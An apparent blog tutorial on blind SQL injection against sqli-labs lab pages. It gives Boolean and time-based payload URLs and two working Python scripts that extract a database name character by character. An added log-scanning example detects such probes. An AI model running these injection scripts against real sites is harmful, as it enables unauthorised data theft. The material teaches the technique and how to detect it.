This article describes how to write an automatic SQL injection script in Python, focusing on GET-based blind injection. Unlike error-based injection, blind injection usually cannot recover information such as table names or column names from the content the page returns; instead, you craft injected SQL statements and infer the answer from the page's returned content or its response time. Two blind-injection methods are implemented here: Boolean-based blind injection and time-based blind injection.
Environment setup
Boolean-based blind injection
Time-based blind injection
?id=1' and length(database())=1 --+
Tests whether the database name has length 1; the page returns abnormally.
?id=1' and length(database())=8 --+
returns normally, which shows that the database name has length 8.
?id=1' and substr(database(),1,1)='letter'--+
determines the database name one character at a time.

import requests
import string

url = "http://10.16.53.180/newsqli/Less-8/"
# Page length for a normal (true) request: the reference used to recognise "true"
normalHtmlLen = len(requests.get(url=url+"?id=1").text)
print("The len of HTML:"+str(normalHtmlLen))

# Step 1: find the length of the database name
dbNameLen = 0
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    print(dbNameLen_url)
    # Same page length as the normal request means the injected condition was true
    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbName:"+str(dbNameLen))
        break
    if dbNameLen == 30:
        print("Error!")
        break
    dbNameLen += 1

# Step 2: recover the name character by character (lowercase letters only)
dbName = ""
for i in range(1, dbNameLen+1):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName += a
            print(dbName)
            break
?id=1' and if(length(database())=8,sleep(5),1) --+
The response time shows that the database name has length 8.
?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
The response time shows that the first character of the database name is "s"; testing characters 1 to 8 of the name in turn yields the full database name.

import requests
import string

url = "http://10.16.53.180/newsqli/Less-9/"

def timeOut(url):
    """Return the page text, or "timeout" if the server did not answer within 3 s."""
    try:
        res = requests.get(url, timeout=3)
        return res.text
    except Exception:
        # sleep(5) on the server side exceeds the 3 s timeout: the condition was true
        return "timeout"

# Step 1: find the length of the database name
dbNameLen = 0
while True:
    dbNameLen += 1
    dbNameLen_url = url + "?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1)--+"
    print(dbNameLen_url)
    if "timeout" in timeOut(dbNameLen_url):
        print(dbNameLen)
        break
    if dbNameLen == 30:
        print("error!")
        break

# Step 2: recover the 8 characters found above, one at a time
dbName = ""
for i in range(1, 9):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+if(substr(database(),"+str(i)+",1)='"+a+"',sleep(5),1)--+"
        print(dbName_url)
        if "timeout" in timeOut(dbName_url):
            dbName += a
            print(dbName)
            break
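As a defensive counterpart, here is an added example that is not part of the original post: a small scanner that reads web-server access-log lines and flags the request shapes the two scripts above produce (length()/substr() probes, sleep() probes, and the "1' and ..." injection point), then counts suspicious requests per client so that the rapid sequential probing of a blind-injection script stands out. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access-log sample: one normal request, then the kind of
# requests the Boolean and time-based scripts emit, plus an unrelated benign request.
SAMPLE_LOG = """\
10.16.53.7 - - [01/Aug/2021:10:00:01 +0800] "GET /newsqli/Less-8/?id=1 HTTP/1.1" 200 921
10.16.53.7 - - [01/Aug/2021:10:00:02 +0800] "GET /newsqli/Less-8/?id=1'+and+length(database())=7--+ HTTP/1.1" 200 702
10.16.53.7 - - [01/Aug/2021:10:00:02 +0800] "GET /newsqli/Less-8/?id=1'+and+length(database())=8--+ HTTP/1.1" 200 921
10.16.53.7 - - [01/Aug/2021:10:00:03 +0800] "GET /newsqli/Less-8/?id=1'+and+substr(database(),1,1)='s'--+ HTTP/1.1" 200 921
10.16.53.9 - - [01/Aug/2021:10:00:09 +0800] "GET /newsqli/Less-9/?id=1'+and+if(length(database())=8,sleep(5),1)--+ HTTP/1.1" 200 921
10.16.53.22 - - [01/Aug/2021:10:00:10 +0800] "GET /newsqli/Less-8/?id=2 HTTP/1.1" 200 930
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)')

# Signatures of the two blind-injection primitives shown in the post.
RULES = {
    "boolean_probe": re.compile(r"\b(length|substr|substring|ascii)\s*\(", re.I),
    "time_probe": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

def classify_request(path):
    """Return the names of the rules matched by one request path (empty list if benign)."""
    decoded = unquote_plus(path)  # the scripts send '+' for spaces and may percent-encode quotes
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    # A quote directly followed by AND/OR marks the "1' and ..." injection point itself
    if re.search(r"'\s*(and|or)\b", decoded, re.I):
        hits.append("generic_quote_and")
    return hits

def scan_log(text):
    """Parse log lines; return (list of (ip, path, hits), Counter of suspicious requests per ip)."""
    findings, per_ip = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        hits = classify_request(m["path"])
        if hits:
            findings.append((m["ip"], m["path"], hits))
            per_ip[m["ip"]] += 1
    return findings, per_ip

def suspicious_ips(per_ip, threshold=2):
    """Clients with at least `threshold` flagged requests: the enumeration loops above send dozens."""
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)
```

Alerting on a single matched request is noisy; the per-client count is what separates a script iterating over length and character values from a one-off odd URL.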
Original: https://www.cnblogs.com/cmx666/p/15119740.html